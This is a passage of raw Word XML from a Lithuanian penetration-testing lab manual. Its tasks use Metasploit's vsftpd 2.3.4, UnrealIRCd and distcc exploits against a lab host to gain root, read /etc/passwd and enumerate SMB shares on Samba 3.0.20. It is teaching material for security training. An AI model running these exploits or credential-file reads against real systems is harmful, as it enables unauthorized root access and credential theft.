          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># umount /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A35B4" w14:textId="595BF5A6" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># ssh root@</w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F5C23" w14:textId="11EE54B7" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="005B5CB7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tikėtinas rezultatas: </w:t>
      </w:r>
      <w:r w:rsidR="005B5CB7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r w:rsidR="005B5CB7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614BDAA2" w14:textId="77777777" w:rsidR="00410814" w:rsidRPr="005A5C28" w:rsidRDefault="00410814" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B213F9B" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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16 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS NR. 2. ĮRANKIO „MSFCONSOLE“ PANAUDOJIMAS PRIVILEGIJUOTO VARTOTOJO TEISIŲ ĮGIJIMUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FE4CB" w14:textId="77777777" w:rsidR="00D94CE4" w:rsidRPr="005A5C28" w:rsidRDefault="00D94CE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD09D04" w14:textId="77777777" w:rsidR="001A2230" w:rsidRPr="005A5C28" w:rsidRDefault="001A2230"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AI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856D9A3" w14:textId="77777777" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E838D4" w14:textId="1E5C34BC" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">msf &gt; search </w:t>
      </w:r>
      <w:r w:rsidR="0081633A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8E518" w14:textId="220439EB" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">msf &gt; use </w:t>
      </w:r>
      <w:r w:rsidR="0081633A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9BFE1" w14:textId="6BA4F306" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf exploit(</w:t>
      </w:r>
      <w:r w:rsidR="0081633A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A305BC" w14:textId="406741E6" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf exploit(</w:t>
      </w:r>
      <w:r w:rsidR="0081633A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011FE5D3" w14:textId="77777777" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">id (tikėtinas rezultatas: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D3CF8" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF60ED" w14:textId="5B63890A" w:rsidR="004A496A" w:rsidRPr="005A5C28" w:rsidRDefault="004A496A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-Nukopijuokite ir išsaugokite failo „/etc/passwd“ turinį</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD209B" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A872813" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E194588" w14:textId="6AF3D2BB" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf &gt; search irc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC880B1" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf &gt; use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F824F" w14:textId="135092BD" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">msf exploit(unreal_ircd_3281_backdoor) &gt; set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="00B80AE2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016EE83" w14:textId="0CFC8B4F" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf exploit(unreal_ircd_3281_backdoor) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC8DAF3" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">id (tikėtinas rezultatas: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A2861" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04663B0C" w14:textId="0968C4FF" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-Nukopijuokite ir išsaugokite failo „/etc/passwd“ turinį</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA04525" w14:textId="328975AF" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FEFCFC" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359A4448" w14:textId="6A73D8E4" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf &gt; search distcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A4962" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf &gt; use &lt;..&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E1C87" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf exploit(distcc_exec) &gt; set RHOST [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03393E7D" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>msf exploit(distcc_exec) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EF3E9" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">id (tikėtinas rezultatas: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C801BD2" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cat /etc/passwd (jeigu suveikė komanda “id“)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B82087" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-Nukopijuokite ir išsaugokite failo „/etc/passwd“ turinį</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E747ADC" w14:textId="77777777" w:rsidR="0081633A" w:rsidRPr="005A5C28" w:rsidRDefault="0081633A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496D5960" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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17 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS NR. 3. ĮRANKIO „MSFCONSOLE“ PANAUDOJIMAS PRIVILEGIJUOTO VARTOTOJO TEISIŲ ĮGIJIMUI PER SMB PROTOKOLĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7457D" w14:textId="77777777" w:rsidR="00AE1A9B" w:rsidRPr="005A5C28" w:rsidRDefault="00AE1A9B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FEA803" w14:textId="77777777" w:rsidR="001A2230" w:rsidRPr="005A5C28" w:rsidRDefault="001A2230"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AI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291737D5" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jungiamės SMB klientu į serverį, peržiūrime „Sharenames“:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5BDBE" w14:textId="23F28000" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>root@kali:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> smbclient -L //192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D1A49" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Anonymous login successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A45DF" w14:textId="7FE112CF" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A76B21" w14:textId="7D493891" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Sharename</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5B923" w14:textId="25832A23" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>---------</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>----</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>-------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C5FFC" w14:textId="65167473" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>print$</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Disk</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
